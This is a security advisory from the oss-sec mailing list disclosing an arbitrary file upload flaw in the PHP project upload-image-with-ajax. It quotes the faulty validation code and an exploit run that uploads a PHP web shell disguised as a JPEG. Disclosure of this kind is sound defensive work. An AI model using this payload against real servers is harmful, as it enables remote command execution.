oss-sec mailing list archives
Arbitrary file upload vulnerability in upload-image-with-ajax v1.0
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Mon, 23 Dec 2019 12:09:16 -0500
Title: Arbitrary file upload vulnerability in upload-image-with-ajax Author: Larry W. Cashdollar Date: 2019-12-16 CVE-ID:[CVE-2019-8292] Download Site: https://github.com/abcprintf/upload-image-with-ajax/ Vendor: adcprintf Vendor Notified: 2019-12-16 Vendor Contact: wh.cprintf () gmail com Advisory: http://www.vapidlabs.com/advisory.php?v=211 Description: upload-image-with-ajax Vulnerability: The code below changes the $ready flag to true if the file conforms to the size of < 1000000. Reversing the check that the file is an image. So, a .php file can be uploaded with only a warning allowing code execution. $ready = false; if((($imageType == "image/jpeg") || ($imageType == "image/jpg") || ($imageType == "image/png"))&&in_array($fileExt, $validext)){ $ready = true; }else{ echo "was not an image "; /You should abort the upload right here/ } if($_FILES["fileUpload"]["size"] < 1000000){ $ready = true; echo "file size is ".$_FILES['fileUpload']["size"]." "; }else{ echo "file was TOO BIG!"; } Exploit Code: $ ./fileupload_exploit 192.168.0.3 80 /upload-image-with-ajax/upload.php POST request size is 469 bytes Sending Payload: POST //upload-image-with-ajax/upload.php HTTP/1.1 Host: 192.168.0.3 User-Agent: File Upload Exploiter/v1.2 Accept: */* Content-Length: 237 Content-Type: multipart/form-data; boundary=------------------------c8e05c8871143853 --------------------------c8e05c8871143853 Content-Disposition: form-data; name="fileUpload"; filename="shell.jpg" Content-Type: image/jpeg <?php $cmd=$_GET['cmd']; system($cmd);?> --------------------------c8e05c8871143853-- HTTP/1.1 200 OK Date: Mon, 16 Dec 2019 04:39:56 GMT Server: Apache/2.4.25 (Debian) Content-Length: 37 Content-Type: text/html; charset=UTF-8 file size is 42<br>upload successful! [+] Total bytes read: 185
Current thread:
- Arbitrary file upload vulnerability in upload-image-with-ajax v1.0 Larry W. Cashdollar (Dec 23)
- <Possible follow-ups>
- Re: Arbitrary file upload vulnerability in upload-image-with-ajax v1.0 Larry W. Cashdollar (Dec 23)